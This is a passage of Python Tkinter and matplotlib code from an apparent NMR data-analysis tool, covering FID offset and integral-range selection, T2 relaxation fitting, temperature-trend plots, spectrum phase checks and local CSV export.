self.canvas_right2._tkcanvas.pack()
#buttons right
self.label_range = tk.Label(self.frame_right3, text='Selected ranges:')
self.label_range.pack(side='left')
self.entry_range_l_var = tk.StringVar(self, value=self.range_l_select)
self.entry_range_l = ttk.Entry(self.frame_right3,
textvariable=self.entry_range_l_var, width=5)
self.entry_range_l.pack(side='left')
self.entry_range_l.bind('<Return>', Set_range)
self.label_range_comma = tk.Label(self.frame_right3, text=' , ')
self.label_range_comma.pack(side='left')
self.entry_range_r_var = tk.StringVar(self, value=self.range_r_select)
self.entry_range_r = ttk.Entry(self.frame_right3,
textvariable=self.entry_range_r_var, width=5)
self.entry_range_r.pack(side='left')
self.entry_range_r.bind('<Return>', Set_range)
self.button_set_range = ttk.Button(self.frame_right3, text='Set range', command=Set_range)
self.button_set_range.pack(side='left')
self.button_close = ttk.Button(self.frame_right3, text='Confirm',
command=self.Close, state='disabled')
self.button_close.pack(side='right')
#button commands
def Previous(self, event=None):
'''Back to the previous step!'''
#reload offset
self.parent.plot_t2_quick.pack(side='left', fill='both', expand=True)
#destroy me
self.pack_forget()
self.destroy()
#unbind global keys
root.unbind('<Right>')
root.unbind('<Left>')
def Confirm_offset(self, event=None):
'''Saves current offset range and opens integral ranges select'''
self.trace.offset_range = (self.offset_select, None)
self.parent.temperatures.previous_t2['offset'] = (self.offset_select, None)
#remember mirroring
self.parent.temperatures.previous_t2['mirroring'] = self.check_mirroring_var.get()
self.trace.mirroring = self.check_mirroring_var.get()
self.Choose_ranges(self.trace)
self.button_confirm.config(state='disabled')
self.button_close.config(state='enabled')
self.button_close.focus_set()
#change global keys
root.bind('<Right>', self.Close)
def Close(self, event=None):
'''Confirm the selection in this screen'''
#save the integral ranges
self.trace.integral_range = (self.range_l_select, self.range_r_select)
self.parent.temperatures.previous_t2['integral_range'] = (self.range_l_select,
self.range_r_select)
#finish the analysis
self.trace.Run()
#unpack and destroy
self.trace.analysed = True
self.parent.plot_t2_quick.destroy()
self.pack_forget()
self.destroy()
plt.close('all')
#unbind global keys
root.unbind('<Right>')
root.unbind('<Left>')
#load the overview frame
self.parent.plot_t2_view = Frame_plot_T2_view(self.parent, self.trace)
def Choose_offset(self, trace):
'''Operations and plotting for choosing the FID offsets'''
fids = list()
for file in trace.file_list:
fid = FID(file, trace.file_dir)
fids.append(fid.x)
x_mean = np.mean(fids[slice(*trace.mean_range)], axis=0)
#plot 1
self.axes_left1 = self.fig_left1.add_subplot(111)
self.axes_left1.plot(np.real(x_mean), color=colors[1], label='Re')
self.axes_left1.plot(np.imag(x_mean), color=colors[2], label='Im')
self.axes_left1.plot(np.abs(x_mean), color=colors[0], label='Abs')
self.axes_left1.axvline(x=trace.mean_shl, color=colors[-1])
self.axes_left1_vline = self.axes_left1.axvline(x=self.offset_select, color=colors[4])
self.axes_left1.margins(0.02, 0.1)
self.axes_left1.set_title('Mean FID')
self.axes_left1.set_xlabel('Time (index)')
self.axes_left1.set_ylabel('Signal (A.U.)')
#self.axes_left1.legend(loc='upper right')
self.axes_left1.grid()
#plot 2
self.axes_left2 = self.fig_left2.add_subplot(111, sharex=self.axes_left1)
for i, fid in enumerate(fids):
self.axes_left2.plot(np.abs(fid)+np.amax(np.abs(x_mean))*0.5*i,
color=colors[i%9], label=str(i))
self.axes_left2.axvline(x=trace.mean_shl, color=colors[-1], label='shl')
self.axes_left2_vline = self.axes_left2.axvline(x=self.offset_select,
color=colors[4], label='Select')
self.axes_left2.margins(0.02, 0.02)
self.axes_left2.set_title('All FIDs')
self.axes_left2.set_xlabel('Time (index)')
self.axes_left2.set_ylabel('Absolute signal (A.U.)')
self.axes_left2.grid()
#draggable vline event
def Drag(event):
'''Allows dragging of the marker in left2, recalculates mean of selected points'''
if event.button == 1 and event.inaxes != None:
#find the index of selected points
self.offset_select = int(event.xdata)
self.entry_offset_var.set(self.offset_select)
#update plot
self.axes_left1_vline.set_xdata(event.xdata)
self.axes_left2_vline.set_xdata(event.xdata)
self.fig_left1.canvas.draw()
self.fig_left2.canvas.draw()
self.axes_left1_vline_drag = self.fig_left1.canvas.mpl_connect('motion_notify_event', Drag)
self.axes_left2_vline_drag = self.fig_left2.canvas.mpl_connect('motion_notify_event', Drag)
def Choose_ranges(self, trace):
'''Operations and plotting for choosing spectrum integral ranges'''
spcs = list()
for file in trace.file_list:
fid = FID(file, trace.file_dir)
fid.Offset(trace.offset_range)
fid.Shift_left(trace.mean_shl, mirroring=trace.mirroring)
fid.Fourier()
fid.Phase_rotate(trace.mean_phase)
spcs.append(fid.spc)
spc_fr = fid.spc_fr
self.spc_fr = spc_fr
spc_mean = np.mean(spcs[slice(*trace.mean_range)], axis=0)
#plot 3
self.axes_right1 = self.fig_right1.add_subplot(111)
self.axes_right1.plot(spc_fr, np.real(spc_mean), color=colors[1], label='Re')
self.axes_right1.plot(spc_fr, np.imag(spc_mean), color=colors[2], label='Im')
self.axes_right1.axvline(x=trace.fr, color=colors[-1])
self.axes_right1_vline_l = self.axes_right1.axvline(x=spc_fr[self.range_l_select],
color=colors[4])
self.axes_right1_vline_r = self.axes_right1.axvline(x=spc_fr[self.range_r_select],
color=colors[4])
self.axes_right1.set_xlim((trace.fr -0.5,+ trace.fr +0.5))
self.axes_right1.set_title('Mean spectrum (Drag with left and right mouse button)')
self.axes_right1.set_xlabel('Frequency (MHz)')
self.axes_right1.set_ylabel('Signal (A.U.)')
self.axes_right1.legend(loc='upper left')
self.axes_right1.grid()
#plot 4
self.axes_right2 = self.fig_right2.add_subplot(111)
for i, spc in enumerate(spcs):
self.axes_right2.plot(spc_fr, np.real(spc)+np.amax(np.abs(spc_mean))*0.5*i,
color=colors[i%9], label=str(i))
self.axes_right1.axvline(x=trace.fr, color=colors[-1])
self.axes_right2_vline_l = self.axes_right2.axvline(x=spc_fr[self.range_l_select],
color=colors[4])
self.axes_right2_vline_r = self.axes_right2.axvline(x=spc_fr[self.range_r_select],
color=colors[4])
self.axes_right2.set_xlim((trace.fr -0.5,+ trace.fr +0.5))
self.axes_right2.margins(0.02, 0.02)
self.axes_right2.set_title('All FIDs')
self.axes_right2.set_xlabel('Frequency (MHz)')
self.axes_right2.set_ylabel('Real part of signal (A.U.)')
self.axes_right2.grid()
#draggable vline event
def Drag(event):
'''Allows dragging of the marker in left2, recalculates mean of selected points'''
if event.button == 1 and event.inaxes != None:
#find the index of selected points
self.range_l_select = np.searchsorted(spc_fr, event.xdata, side='left')
self.entry_range_l_var.set(self.range_l_select)
#update plot
self.axes_right1_vline_l.set_xdata(event.xdata)
self.axes_right2_vline_l.set_xdata(event.xdata)
self.fig_right1.canvas.draw()
self.fig_right2.canvas.draw()
if event.button == 3 and event.inaxes != None:
#find the index of selected points
self.range_r_select = np.searchsorted(spc_fr, event.xdata, side='right')
self.entry_range_r_var.set(self.range_r_select)
#update plot
self.axes_right1_vline_r.set_xdata(event.xdata)
self.axes_right2_vline_r.set_xdata(event.xdata)
self.fig_right1.canvas.draw()
self.fig_right2.canvas.draw()
self.axes_right1_vline_drag = self.fig_right1.canvas.mpl_connect('motion_notify_event', Drag)
self.axes_right2_vline_drag = self.fig_right2.canvas.mpl_connect('motion_notify_event', Drag)
self.fig_right1.canvas.draw()
self.fig_right2.canvas.draw()
class Frame_plot_T2_view(tk.Frame):
'''Pioneer first T2 preview plot'''
def __init__(self, parent, trace):
'''makes the subframe and fills it up'''
tk.Frame.__init__(self, parent)
self.pack(side='left', anchor='n')
#reference to parent
self.parent = parent
#reference to current trace:
self.trace = trace
#load widgets
self.Widgets()
#global key bind
root.bind('<Right>', self.Confirm)
def Widgets(self):
'''Builds all the subframes and canvases'''
#button commands
def Disable(event=None):
'''Disables and red-flags the point to avoid plotting'''
#try:
self.trace.disabled = not self.trace.disabled
#except:
# self.trace.disabled = True
self.Refresh_parameters()
def Repeat(event=None):
'''Clears the T2 trace and starts the analysis from scratch'''
self.trace.Reinit()
self.Confirm()
self.trace.analysed = False
#bottom button row
self.frame_bottom = tk.Frame(self)
self.frame_bottom.pack(side='bottom', fill='x')
#split in columns
self.frame_parameters = tk.Frame(self, bd=5)
self.frame_parameters.pack(side='left', anchor='n')
self.frame_plot = tk.Frame(self, bd=5)
self.frame_plot.pack(side='left', anchor='n')
#parameters
self.label_parameters = tk.Label(self.frame_parameters, text='Parameters')
self.label_parameters.pack(side='top')
self.tree_columns = ('Name','Value')
self.tree_parameters = ttk.Treeview(self.frame_parameters, columns=self.tree_columns,
show='headings', selectmode='none', height=25)
self.tree_parameters.pack(side='top',fill='y', expand=True)
#define column widths
self.tree_parameters.column('Name', width=80)
self.tree_parameters.column('Value', width=120)
#define column names
for column in self.tree_columns:
self.tree_parameters.heading(column, text=column)
#display in degrees
self.trace.mean_phase_deg = self.trace.mean_phase*180/np.pi
#fill in params
self.Refresh_parameters()
# disable point button
self.button_disable = ttk.Button(self.frame_parameters, text='Disable/enable Point',
command=Disable, width=20)
self.button_disable.pack(side='top')
#redo analysis button
self.button_repeat = ttk.Button(self.frame_parameters, text='Repeat analysis',
command=Repeat, width=20)
self.button_repeat.pack(side='top')
#T2 plot
self.fig_t2 = plt.figure(dpi=100, figsize=(8,6))
self.fig_t2.subplots_adjust(bottom=0.1, left= 0.10, right=0.96, top=0.94)
self.fig_t2.suptitle(self.trace.file_key, x=0.01, horizontalalignment='left')
self.fig_t2.text(0.82, 0.97, r'$y_0 \exp(-(\frac{x}{T_2})^r)$',
horizontalalignment='center', verticalalignment='center')
self.canvas_t2 = FigureCanvasTkAgg(self.fig_t2, self.frame_plot)
self.canvas_t2._tkcanvas.pack()
self.Fill_plot()
self.Fitting_frame()
def Fitting_frame(self, event=None):
'''Initializes/repacks the fitting frame, depending on the selected fitting function'''
#repack
try:
self.frame_fit.destroy()
except:
pass
#fit frame
self.frame_fit = tk.Frame(self, bd=5)
self.frame_fit.pack(side='left', anchor='n', fill='y')
#fit functions
def Fit_exponential(x, T2=0.001, y0=1000, r=1):
'''T2 exponential fit model'''
return y0*np.exp(-(x/T2)**r)
def Fit_2exponential(x, T21=0.001, T22=0.01, y01=100, y02=100, r=1):
'''T2 double exponential decay model'''
return y01*np.exp(-x/T21) + y02*np.exp(-x/T22)\
def Fit_exp_gauss(x, T21=0.001, T22=0.01, y01=100, y02=100, r=1):
'''T2 exponential plus gaussian model'''
return y01*np.exp(-x/T21) + y02*np.exp(-(x/T22)**2)
def Fit_exp_gauss_2(x, T21=0.001, T22=0.01, y0=100, r=1):
'''T2 exponential and gaussian model'''
return y0*np.exp(-x/T21 -(x/(2*T22))**2)
#fit start point estimates
yy1=self.trace.area_list[0]
yy2=self.trace.area_list[5]
xx1=self.trace.tau_list[0]
xx2=self.trace.tau_list[5]
kk=(yy2-yy1)/(xx2-xx1)
nn=yy1-kk*xx1
#reference to functions #[self.trace.tau_list[self.trace.mean_range[1]]
# [function, fit_params, start guess, label, tex_form]
self.fit_names = {'Single Exp':[Fit_exponential, ['T2', 'y0', 'r'], [-nn/kk, nn, 1],
'y0*exp(-(x/T2)^r)'],
'Double Exp':[Fit_2exponential, ['T21','T22', 'y01', 'y02', 'r'],
[-nn/kk, -nn/kk*10, nn/2, nn/2, 1],
'y01*exp(-x/T21)+y02*exp(-x/T22)'],
'Gauss Exp':[Fit_exp_gauss, ['T21','T22', 'y01', 'y02', 'r'],
[-nn/kk, -nn/kk, nn/2, nn/2, 1],
'y01*exp(-x/T21)+y02*exp((-x/T22)**2)'],
'Gauss Exp 2':[Fit_exp_gauss_2, ['T21','T22', 'y0', 'r'],
[-nn/kk, -nn/kk, nn/2, 1],
'y0*exp(-x/T21 -(x/(2*T22))**2 )']
}
def Fit():
'''Executes the fit with given parameters and plots it'''
Fit_function = self.fit_names[self.combo_fit_var.get()][0]
#read values from entry boxes
start_params = dict()
for entry,param in zip(self.entry_params_start, param_list):
start_params[param]=float(entry.get())
#data points
x = np.array(self.trace.tau_list)*2
y = self.trace.area_list
y_start = [Fit_function(xx, **start_params) for xx in x]
#check if last parameter is enabled or not
p_start = [start_params[key] for key in param_list]
if not self.check_params_start_var.get():
r_tmp = p_start.pop(-1)
self.entry_params_fit[-1].config(state='normal')
self.entry_params_fit[-1].delete(0, 'end')
self.entry_params_fit[-1].insert('end', 1)
self.entry_params_fit[-1].config(state='readonly')
#run fit, p_optimal, p_covariance matrix
if not self.check_params_start_var.get():
popt,pcov = curve_fit(lambda x, *param_list: Fit_function(x, *param_list, r=r_tmp), x, y, p0=p_start)
else:
popt,pcov = curve_fit(Fit_function, x, y, p0=p_start)
#readd last parameter
if not self.check_params_start_var.get():
popt = np.append(popt, r_tmp)
y_fit = [Fit_function(xx, *popt) for xx in x]
#print values to entry boxes
for i,p in enumerate(popt):
self.entry_params_fit[i].config(state='normal')
self.entry_params_fit[i].delete(0, 'end')
self.entry_params_fit[i].insert('end','%.4g' %p)
self.entry_params_fit[i].config(state='readonly')
#update plots
self.axes_start_plot.set_ydata(y_start)
self.axes_fit_plot.set_ydata(y_fit)
self.fig_t2.canvas.draw()
#save parameters
self.trace.fit_params = popt
self.trace.fit_param_cov = pcov
self.trace.fit_fun = self.combo_fit_var.get()
self.trace.T2 = popt[0]
#if self.check_params_start_var.get():
self.trace.r = popt[-1]
#else:
# self.trace.r = 1
self.Refresh_parameters()
def Change_fit(event=None):
'''Changes the current fitting function'''
#update memory in parent
self.parent.temperatures.previous_t2['fit']=self.combo_fit_var.get()
#reload
self.Fitting_frame()
#rerun
#Fit()
#implement more options later if necessary
self.label_fit = tk.Label(self.frame_fit, text='Fitting function')
self.label_fit.pack(side='top')
self.combo_fit_var = tk.StringVar()
try:
self.combo_fit_var.set(self.parent.temperatures.previous_t2['fit'])
except KeyError:
self.combo_fit_var.set('Single Exp')
self.parent.temperatures.previous_t2['fit']='Single Exp'
self.combo_fit = ttk.Combobox(self.frame_fit, state='readonly', values=sorted(list(self.fit_names.keys())),
textvar=self.combo_fit_var)
self.combo_fit.pack(side='top')
self.combo_fit.bind("<<ComboboxSelected>>", Change_fit)
self.label_fit_fun = tk.Label(self.frame_fit, text=self.fit_names[self.combo_fit_var.get()][3], bd=5)
self.label_fit_fun.pack(side='top')
self.label_starting_params = tk.Label(self.frame_fit, text='Starting values', bd=5)
self.label_starting_params.pack(side='top')
param_list = self.fit_names[self.combo_fit_var.get()][1]
#guesses for where params should start
start_guess = self.fit_names[self.combo_fit_var.get()][2]
#start parameters entry rows
self.frame_params_start = list()
self.label_params_start = list()
self.entry_params_start = list()
for i,param in enumerate(param_list):
self.frame_params_start.append(tk.Frame(self.frame_fit))
self.frame_params_start[i].pack(side='top', fill='y')
self.label_params_start.append(tk.Label(self.frame_params_start[i], text=param+' = '))
self.label_params_start[i].pack(side='left', anchor='e')
self.entry_params_start.append(tk.Entry(self.frame_params_start[i],
width=10, justify='right'))
self.entry_params_start[i].insert(0, '%.4g' % start_guess[i])
self.entry_params_start[i].pack(side='left', anchor='e')
self.check_params_start_var = tk.BooleanVar(self, 0)
self.check_params_start = (ttk.Checkbutton(self.frame_params_start[-1],
variable=self.check_params_start_var))
self.check_params_start.pack(side='left')
self.button_fit = ttk.Button(self.frame_fit, text='Retry fit', command=Fit)
self.button_fit.pack(side='top')
self.label_fit_params = tk.Label(self.frame_fit, text='Fitted values', bd=5)
self.label_fit_params.pack(side='top')
#fit results entry rows
self.frame_params_fit = list()
self.label_params_fit = list()
self.entry_params_fit = list()
for i,param in enumerate(param_list):
self.frame_params_fit.append(tk.Frame(self.frame_fit))
self.frame_params_fit[i].pack(side='top', fill='y')
self.label_params_fit.append(tk.Label(self.frame_params_fit[i], text=param+' = '))
self.label_params_fit[i].pack(side='left')
self.entry_params_fit.append(tk.Entry(self.frame_params_fit[i], width=10,
state='readonly', justify='right'))
self.entry_params_fit[i].pack(side='left')
#run first lap of fit
Fit()
#add button to confirm selection
self.button_confirm = ttk.Button(self.frame_fit, text='Confirm', command=self.Confirm)
self.button_confirm.pack(side='bottom')
self.button_confirm.bind('<Return>', self.Confirm)
#export csv button
self.button_export = ttk.Button(self.frame_fit, text='Export CSV', command=self.Export)
self.button_export.pack(side='bottom')
self.button_export.bind('<F5>', self.Export)
def Confirm(self, event=None):
'''Confirm the selection in this screen'''
#unpack, dont destroy untill series is done, in case corrections are needed
self.parent.temperatures.wait.set(False)
self.pack_forget()
self.destroy()
plt.close('all')
#move to later stages
self.trace.analysed = True
def Refresh_parameters(self):
'''refreshes the parameters table'''
self.tree_parameters.delete(*self.tree_parameters.get_children())
self.trace.Get_params()
for item in GLOBAL_t2_displayed_params:
try:
pair = (item, self.trace.__dict__[item])
self.tree_parameters.insert('', 'end', values=pair)
except: pass
def Export(self, event=None):
'''Saves the datapoints of the plot to a CSV file'''
file_name = self.trace.file_key + '.csv'
file_directory = os.path.join('data', self.parent.current_experiment, 'csv', 'T2_raw', )
#make the csv folder for old experiments
try:
os.mkdir(file_directory)
except: pass
#write file
with open(os.path.join(file_directory, file_name), 'w', newline='') as f:
writer = csv.writer(f, delimiter=';')
#name row
writer.writerow(['tau(s)', 'Signal(a.u.)'])
#data
for i in range(len(self.trace.tau_list)):
row = [self.trace.tau_list[i], self.trace.area_list[i]]
writer.writerow(row)
tk.messagebox.showinfo('Export complete', 'The file was saved as '+file_name)
def Fill_plot(self):
'''Plots the T1 trend and fits it'''
#data lines
x = np.array(self.trace.tau_list)*2
y = np.array(self.trace.area_list)
#T1 plot
self.axes = self.fig_t2.add_subplot(111)
self.axes.plot(x, y, 'bo', color=colors[1], label='Data')
self.axes_start_plot, = self.axes.plot(x, y, color=colors[3],
linestyle='dashed', label='Fit start')
self.axes_fit_plot, = self.axes.plot(x, y, color=colors[4], label='Fit')
self.axes.axvline(x=x[self.trace.mean_range[1]], color=colors[2])
self.axes.set_yscale('log')
self.axes.set_title('T2')
self.axes.set_xlabel(r'2*$\tau$ ($\mu$s)')
self.axes.set_ylabel('Signal')
legend = self.axes.legend(loc='lower right')
self.axes.grid()
class Frame_plot_T2_t2vt(tk.Frame):
'''T2vT trend plotting'''
def __init__(self, parent, trace):
'''makes the subframe and fills it up'''
tk.Frame.__init__(self, parent)
self.pack(side='left', anchor='n')
#reference to parent
self.parent = parent
#reference to current series
self.trace = trace
#counter for plots
self.counter = 0
#load widgets
self.Widgets()
def Widgets(self):
'''Builds all the subframes and canvases'''
#button commands
def Confirm(event=None):
'''Confirm the selection in this screen'''
#unpack, dont destroy untill series is done, in case corrections are needed
self.parent.temperatures.wait.set(False)
self.pack_forget()
self.destroy()
plt.close('all')
self.parent.traces.button_show.config(state='normal')
#split in columns
self.frame_plot_left = tk.Frame(self)
self.frame_plot_left.pack(side='left', anchor='n')
self.frame_plot_right = tk.Frame(self)
self.frame_plot_right.pack(side='left', anchor='n')
#plot frames
self.frame_plot1 = tk.Frame(self.frame_plot_left, bd=5)
self.frame_plot1.pack(side='top', anchor='n')
self.frame_plot2 = tk.Frame(self.frame_plot_right, bd=5)
self.frame_plot2.pack(side='top', anchor='n')
self.frame_plot3 = tk.Frame(self.frame_plot_right, bd=5)
self.frame_plot3.pack(side='top', anchor='n')
#buttons frame
self.frame_buttons = tk.Frame(self.frame_plot_right, bd=5)
self.frame_buttons.pack(side='top', anchor='e')
#T1 plot
self.fig_t2vt = plt.figure(dpi=100, figsize=(7,4.5))
self.fig_t2vt.subplots_adjust(bottom=0.12, left= 0.11, right=0.96, top=0.94)
self.canvas_t2vt = FigureCanvasTkAgg(self.fig_t2vt, self.frame_plot1)
self.canvas_t2vt._tkcanvas.pack()
#fr plot
self.fig_fr = plt.figure(dpi=100, figsize=(7,2.5))
self.fig_fr.subplots_adjust(bottom=0.18, left= 0.11, right=0.96, top=0.90)
self.canvas_fr = FigureCanvasTkAgg(self.fig_fr, self.frame_plot2)
self.canvas_fr._tkcanvas.pack()
#stretch plot
self.fig_r = plt.figure(dpi=100, figsize=(7,2.5))
self.fig_r.subplots_adjust(bottom=0.18, left= 0.11, right=0.96, top=0.90)
self.canvas_r = FigureCanvasTkAgg(self.fig_r, self.frame_plot3)
self.canvas_r._tkcanvas.pack()
#add button to confirm selection
self.button_confirm = ttk.Button(self.frame_buttons, text='Confirm', command=Confirm)
self.button_confirm.pack(side='right', anchor='e')
self.button_confirm.bind('<Return>', Confirm)
self.Fill_plot()
#add button to export to csv
self.button_export = ttk.Button(self.frame_buttons, text='Export CSV', command=self.Export)
self.button_export.pack(side='right', anchor='e')
def Add_trace(self, trace):
'''Adds traces to plots using given trace'''
#initialize lists
x = list()
y = list()
fr = list()
r = list()
#prepare all items for export
popts = list()
pcovs = list()
for temp in self.trace:
if self.trace[temp].analysed and not self.trace[temp].disabled:
x.append(temp)
y.append(self.trace[temp].T2)
#maby calculate some center frequency at some point?
fr.append(self.trace[temp].fr)
#get stretch
try:
r.append(self.trace[temp].r)
except AttributeError:
r.append(1)
#get second T2
except AttributeError:
yb.append(1)
name = self.trace[temp].file_key
popts.append(self.trace[temp].fit_params)
pcovs.append(self.trace[temp].fit_param_cov)
#sort by temperature
sorting = np.argsort(x)
x = np.array(x)[sorting]
y = np.array(y)[sorting]
y2 = 1/y
fr = np.array(fr)[sorting]
r = np.array(r)[sorting]
popts = np.array(popts)[sorting]
pcovs = np.array(pcovs)[sorting]
#draw trace
self.axes_1.plot(x, y2, 'bo', color=colors[self.counter],
label=self.parent.current_trace, linestyle='dashed')
self.axes_2.plot(x, fr, 'bo', color=colors[self.counter],
label=self.parent.current_trace, linestyle='dashed')
self.axes_3.plot(x, r, 'bo', color=colors[self.counter],
label=self.parent.current_trace, linestyle='dashed')
#save for export
self.data = dict()
self.data['T'] = x
self.data['T2'] = y
self.data['fr'] = fr
self.data['r'] = r
self.data['popts'] = popts
self.data['pcovs'] = pcovs
#increase plot counter
self.counter += 1
def Export(self):
'''Saves the plotted data into a CSV file for further analysis'''
file_name = self.parent.current_trace + '.csv'
file_directory = os.path.join('data', self.parent.current_experiment, 'csv', 'T2')
#make the csv folder for old experiments
try:
os.mkdir(file_directory)
except: pass
#write file
with open(os.path.join(file_directory, file_name), 'w', newline='') as f:
writer = csv.writer(f, delimiter=';')
#name row
writer.writerow(['T(K)', 'T2(s)', 'fr(MHz)', 'r', 'popts'])
#data
for i in range(len(self.data['T'])):
row = [self.data['T'][i], self.data['T2'][i], self.data['fr'][i], self.data['r'][i]] + list(self.data['popts'][i])
writer.writerow(row)
tk.messagebox.showinfo('Export complete', 'The file was saved as '+file_name)
def Fill_plot(self):
'''Creates the plots for T2vT'''
self.axes_1 = self.fig_t2vt.add_subplot(111)
self.axes_1.set_xscale('log')
self.axes_1.set_yscale('log')
self.axes_1.set_title('T2 temperature dependence')
self.axes_1.set_xlabel('Temperature (K)')
self.axes_1.set_ylabel(r'1/T2 (1/$\mu$s)')
#self.axes_1.legend(loc='lower right')
self.axes_1.grid()
self.axes_2 = self.fig_fr.add_subplot(111)
self.axes_2.set_title('Center frequencies')
self.axes_2.set_xlabel('Temperature (K)')
self.axes_2.set_ylabel('Frequency (MHz)')
#self.axes_2.get_yaxis().get_major_formatter().set_useOffset(False)
self.axes_2.margins(0.05, 0.1)
self.axes_2.grid()
self.axes_3 = self.fig_r.add_subplot(111)
self.axes_3.set_title('Stretch')
self.axes_3.set_xlabel('Temperature (K)')
self.axes_3.set_ylabel('Stretch r')
#self.axes_3.get_yaxis().get_major_formatter().set_useOffset(False)
self.axes_3.margins(0.05, 0.1)
self.axes_3.grid()
class Frame_plot_spc_quick(tk.Frame):
'''Quick settings for spectrum gluing'''
def __init__(self, parent, trace):
'''makes the subframe and fills it up'''
tk.Frame.__init__(self, parent, bd=5)
self.pack(side='left', fill='both', expand=True)
#reference to parent
self.parent = parent
#reference to current trace:
self.trace = trace
#starting data
self.shl = self.parent.temperatures.previous_spc['shl_start']
self.mirroring = self.parent.temperatures.previous_spc['mirroring']
self.offset_select = self.parent.temperatures.previous_spc['offset'][0]
#load widgets
self.Widgets()
#run quick t1
quick_tables = trace.Quick_spc()
self.Fill_plots(*quick_tables)
#take focus away from listbox
self.focus()
#global key binds
root.bind('<Left>', self.Interrupt)
root.bind('<Right>', self.Confirm)
def Confirm(self, event=None):
'''Saves shl, disables its selection and plots phases'''
#disable shl setters
self.entry_shl.config(state='disabled')
self.button_set_shl.config(state='disabled')
self.check_mirroring.config(state='disabled')
self.button_confirm_shl.config(state='disabled')
self.entry_offset.config(state='disabled')
self.button_set_offset.config(state='disabled')
#disconnect drag events
self.fig_left2.canvas.mpl_disconnect(self.axes_left2_vline_drag)
self.fig_right1.canvas.mpl_disconnect(self.axes_right1_hline_drag)
#enable confirm button
self.button_confirm.config(state='enabled')
self.entry_k.config(state='enabled')
self.entry_n.config(state='enabled')
self.button_fit.config(state='enabled')
#remember shl
self.mean_shl = self.shl
self.trace.mean_shl = self.shl
self.parent.temperatures.previous_spc['shl_start']=self.shl
#remember offset
self.trace.offset_range = (self.offset_select, None)
self.parent.temperatures.previous_spc['offset'] = (self.offset_select, None)
#remember mirroring
self.trace.mirroring = self.check_mirroring_var.get()
self.parent.temperatures.previous_spc['mirroring'] = self.check_mirroring_var.get()
self.trace.Get_phase(self.shl, (self.offset_select,None),
(self.fit_range_l_var.get(), self.fit_range_r_var.get())
)
#update entry values
self.entry_k_var.set('%.4g' %self.trace.phase_fit_p[0])
self.entry_n_var.set('%.4g' %self.trace.phase_fit_p[1])
#plot 4 phase
self.axes_right2 = self.fig_right2.add_subplot(111)
self.axes_right2.plot(self.trace.fr_list, np.unwrap(self.trace.phase_list, 0.5*np.pi), marker='.',
color=colors[1], label='SHL')
self.axes_right2_line2, = self.axes_right2.plot(self.trace.fr_list, self.trace.phase_fit,
color=colors[2], label='linear fit')
self.axes_vline_l = self.axes_right2.axvline(x=self.trace.fr_list[self.fit_range_l_var.get()], color=colors[4])
self.axes_vline_r = self.axes_right2.axvline(x=self.trace.fr_list[self.fit_range_r_var.get()-1], color=colors[4])
self.axes_right2.margins(0.02, 0.1)
self.axes_right2.set_title('Phase check')
self.axes_right2.set_xlabel('Frequency (MHz)')
self.axes_right2.set_ylabel('Shift left')
#self.axes_right2.legend(loc='lower right')
self.axes_right2.grid()
self.fig_right2.canvas.draw()
def Drag(event):
'''Allows dragging of the markers for fit range on spectrum plot'''
if event.button == 1 and event.inaxes != None:
#find the index of selected points
self.fit_range_l_var.set(np.searchsorted(self.trace.fr_list, event.xdata, side='right'))
#print(self.fit_range_l_var.get())
#self.range_l_select = int(event.xdata)
#update plot
self.axes_vline_l.set_xdata(event.xdata)
self.fig_right2.canvas.draw()
if event.button == 3 and event.inaxes != None:
#find the index of selected points
self.fit_range_r_var.set(np.searchsorted(self.trace.fr_list, event.xdata, side='left'))
#print(self.fit_range_r_var.get())
#self.range_r_select = int(event.xdata)
#update plot
self.axes_vline_r.set_xdata(event.xdata)
self.fig_right2.canvas.draw()
self.axes_vline_drag = self.fig_right2.canvas.mpl_connect('motion_notify_event', Drag)
root.bind('<Right>', self.Finish)
def Finish(self, event=None):
'''Accepts the data on this screen and closes it up'''
#hide this frame
self.pack_forget()
#close plots
plt.close('all')
#forget global key bind
root.unbind('<Right>')
root.unbind('<Left>')
#run next frame
self.parent.plot_spc_ranges = Frame_plot_spc_ranges(self.parent, self.trace)
def Interrupt(self, event=None):
'''Stops the analysis loop'''
#Destroy frame and plots
self.pack_forget()
self.destroy()
plt.close('all')
#unbind global keys
root.unbind('<Right>')
root.unbind('<Left>')
#stop the analysis loop
self.parent.temperatures.wait.set(False)
def Refit(self, event=None):
'''manual fit, change k, n values'''
## #manual version
## k = float(self.entry_k_var.get())
## n = float(self.entry_n_var.get())
## x = np.array(self.trace.fr_list)
## y = k*x+n
## self.axes_right2_line2.set_ydata(y)
##
## self.fig_right2.canvas.draw()
##
## self.trace.phase_fit_p = [k, n]
## self.trace.phase_fir = y
#refit using new fit range
self.trace.Get_phase(self.shl, (self.offset_select,None),
(self.fit_range_l_var.get(), self.fit_range_r_var.get())
)
self.axes_right2_line2.set_ydata(self.trace.phase_fit)
self.fig_right2.canvas.draw()
self.entry_k_var.set('%.4g' %self.trace.phase_fit_p[0])
self.entry_n_var.set('%.4g' %self.trace.phase_fit_p[1])
def Widgets(self):
'''Builds all the subframes and canvases'''
def Set_shl(event=None):
'''Entry chang eof shl, replot with new value'''
try:
self.shl = int(self.entry_shl.get())
#update plots
self.axes_left2_vline.set_xdata(self.shl)
self.axes_right1_hline.set_ydata(self.shl)
self.fig_left2.canvas.draw()
self.fig_right1.canvas.draw()
except ValueError:
tk.messagebox.showerror('Error', 'The inserted value must be integer!')
def Set_offset(event=None):
'''Entry change of offset select, replot with new value'''
try:
self.offset_select = int(self.entry_offset.get())
#update plots
self.axes_left2_vline_offset.set_xdata(self.offset_select)
self.fig_left2.canvas.draw()
except ValueError:
tk.messagebox.showerror('Error', 'The inserted value must be integer!')
#split in two half frames
self.frame_left = tk.Frame(self)
self.frame_right = tk.Frame(self)
self.frame_left.pack(side='left', fill='y')
self.frame_right.pack(side='left', fill='y')
#add frames on left side
self.frame_left1 = tk.Frame(self.frame_left, bd=5)
self.frame_left2 = tk.Frame(self.frame_left, bd=5)
self.frame_left3 = tk.Frame(self.frame_left, bd=5)
self.frame_left1.pack(side='top')
self.frame_left2.pack(side='top')
self.frame_left3.pack(side='top', fill='x')
#add frames on right side
self.frame_right1 = tk.Frame(self.frame_right, bd=5)
self.frame_right2 = tk.Frame(self.frame_right, bd=5)
self.frame_right3 = tk.Frame(self.frame_right, bd=5)
self.frame_right4 = tk.Frame(self.frame_right, bd=5)
self.frame_right1.pack(side='top')
self.frame_right2.pack(side='top', fill='x')
self.frame_right3.pack(side='top')
self.frame_right4.pack(side='top', fill='x')
#add canvases and toolbars
#plot 1
self.fig_left1 = plt.figure(dpi=100, figsize=(7,2.5))
